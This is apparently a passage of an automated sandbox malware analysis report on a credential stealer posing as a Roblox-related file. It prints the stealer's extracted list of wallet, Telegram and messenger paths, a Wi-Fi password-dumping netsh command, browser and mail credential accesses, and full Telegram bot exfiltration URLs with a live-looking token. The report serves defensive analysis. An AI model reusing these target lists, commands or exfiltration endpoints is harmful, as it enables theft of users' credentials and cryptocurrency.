name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>\wallet</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string></string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>.db;.tox;.ini;.json;.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>s;????????????????\s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>\wallet</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string></string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>.db;.tox;.ini;.json;.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>s;????????????????\s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>\wallet</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string></string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>.db;.tox;.ini;.json;.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>s;????????????????\s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>\wallet</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string></string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>.db;.tox;.ini;.json;.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>s;????????????????\s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>\wallet</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string></string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
Source: powershell.exe, 00000001.00000002.1715254235.00000000062C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Yara detected Credential Stealer

Source: Yara match	File source: 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR

Remote Access Functionality

Yara detected Gurcu Stealer

Source: Yara match	File source: 0000002D.00000002.3553295709.00000167D1889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2953825020.000001EC01AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 7316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 7712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 125704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 325468, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR

Yara detected WhiteSnake Stealer

Source: Yara match

File source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
82.147.85.194	unknown	Russian Federation	31112	SIBTEL-ASRU	false
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
138.68.79.95	serveo.net	United States	14061	DIGITALOCEAN-ASNUS	false
185.119.118.59	unknown	Austria	44133	IPAX-ASAT	false

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
serveo.net	138.68.79.95	true
ip-api.com	208.95.112.1	true
api.telegram.org	149.154.167.220	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe2111f95f52ba8be6b2d3394e38b1722.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML	false		high
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe483612b93e055308d0c85f365c474ee.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML	false		high
http://ip-api.com/line?fields=query,country	false		high
http://82.147.85.194/byte/@jokerbot880901.txt	false	Avira URL Cloud: malware	unknown
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML	false		high
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML	false		high

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://216.250.190.139:80	Avira URL Cloud: Label: malware
Source: https://192.99.196.191:443	Avira URL Cloud: Label: malware
Source: http://66.42.56.128:80	Avira URL Cloud: Label: malware
Source: http://82.147.85.194/byte/@jokerbot880901.txt	Avira URL Cloud: Label: malware
Source: http://185.217.98.121:80	Avira URL Cloud: Label: malware
Source: https://44.228.161.50:443	Avira URL Cloud: Label: malware
Source: https://164.90.185.9:443	Avira URL Cloud: Label: malware
Source: http://18.228.80.130:80	Avira URL Cloud: Label: malware
Source: http://185.217.98.121:8080	Avira URL Cloud: Label: malware
Source: http://pesterbdd.com/i?	Avira URL Cloud: Label: malware
Source: http://82.147.85.194/byte/	Avira URL Cloud: Label: malware
Source: https://185.217.98.121:443	Avira URL Cloud: Label: malware
Source: http://116.202.101.219:8080	Avira URL Cloud: Label: malware
Source: http://206.189.109.146:80	Avira URL Cloud: Label: malware

Found malware configuration

Source: vkefq4cv.oil.exe.8072.18.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage"}
Source: vkefq4cv.oil.exe.8072.18.memstrmin	Malware Configuration Extractor: Gurcu Stealer {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349"}

Multi AV Scanner detection for domain / URL

Source: serveo.net	Virustotal: Detection: 7%	Perma Link
Source: http://216.250.190.139:80	Virustotal: Detection: 7%	Perma Link
Source: http://193.142.58.127:80	Virustotal: Detection: 6%	Perma Link
Source: http://66.42.56.128:80	Virustotal: Detection: 8%	Perma Link
Source: http://185.217.98.121:80	Virustotal: Detection: 15%	Perma Link
Source: https://164.90.185.9:443	Virustotal: Detection: 8%	Perma Link
Source: http://18.228.80.130:80	Virustotal: Detection: 10%	Perma Link
Source: http://185.217.98.121:8080	Virustotal: Detection: 11%	Perma Link

Multi AV Scanner detection for submitted file

Source: jqOHOuPMJP.exe	ReversingLabs: Detection: 13%
Source: jqOHOuPMJP.exe	Virustotal: Detection: 24%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: jqOHOuPMJP.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: >{tnnsqc7~br
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: >tyy`ejj/euh5tx,r
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: 9s{tgd}b}~yr
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: ,yqdr,j!)/$"+}$#.~!%-$'-,+rzy"$xz&'),##z)wr.-#
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: fn{m8Gq}pjjf"gw~f+~~kg}{
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: jkK\k
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: -{whzMWg1sq&G
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: fbnu8ci*OJ ~{~t
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: faww8i}fpkdmmjq
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: 3&k-m88"+89"+8:"+
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: .dylpGul=`hz#o}
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: flq8JSNR[YPQ
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack	String decryptor: 88r`bE:~!ba}<}!pvvfs\|1~q9o{d(us8:>!sme`''ml29o)r,c\|}!\|!vqr:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 11_2_00007FFD9B9784B1 CryptUnprotectData,	11_2_00007FFD9B9784B1
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 11_2_00007FFD9B9785FD CryptUnprotectData,	11_2_00007FFD9B9785FD
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 18_2_00007FFD9B9784A1 CryptUnprotectData,	18_2_00007FFD9B9784A1

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49744 version: TLS 1.2

Source: jqOHOuPMJP.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: WINLOA~1.PDBwinload_prod.pdbD966DD2-7850-423A-B1D8-7882CE1A6D15.log source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\system32\rsaenh.dll.pdb\| source: vkefq4cv.oil.exe, 00000012.00000002.2077754048.0000010DF0DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Drawing.ni.pdb source: WERCB81.tmp.dmp.41.dr
